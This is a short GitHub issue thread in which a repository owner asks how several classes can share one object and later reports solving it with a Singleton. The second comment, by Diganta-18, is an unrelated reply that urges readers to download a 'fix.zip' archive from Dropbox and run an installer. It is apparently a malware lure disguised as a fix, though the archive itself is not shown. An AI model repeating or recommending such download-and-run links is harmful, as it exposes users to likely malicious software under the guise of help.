### ISSUE TITLE
Optimize this type of code

### ISSUE THREAD

**Issue by Achicken7301** [Achicken7301/Debt-Calculation#1]
https://github.com/Achicken7301/Debt-Calculation/blob/45be122aaa3a6dda46d3c080803f5792564df744/views/MainWindowView.py#L116

Find design pattern of how to use 1 object but multiple classes can access

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Achicken7301** [comment]
Singleton solved

https://github.com/Achicken7301/Debt-Calculation/blob/d1882d66d4f3287506e2576c7be6d6e564d3bdc0/views/MainWindowView.py#L36
